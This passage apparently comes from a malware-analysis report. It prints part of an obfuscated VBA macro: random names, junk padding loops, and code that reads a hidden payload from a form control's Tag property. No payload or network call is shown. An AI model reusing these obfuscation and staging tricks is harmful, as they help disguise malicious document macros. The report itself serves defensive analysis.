Vjuubrxz0odyouba = Njbkp89a2qwrw + Join(U55bv2p2byg5ur5t, Vm3yolwksn21s7h)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
B2r_w0kzcx9xi48t = Vjuubrxz0odyouba
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function Scp6tfclrri8kz()
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Hbrd7b9mje6jtmu = Ar0b15zn5_jh.Pl19_xhd7r3.Tag
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Scp6tfclrri8kz = B2r_w0kzcx9xi48t(Hbrd7b9mje6jtmu)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.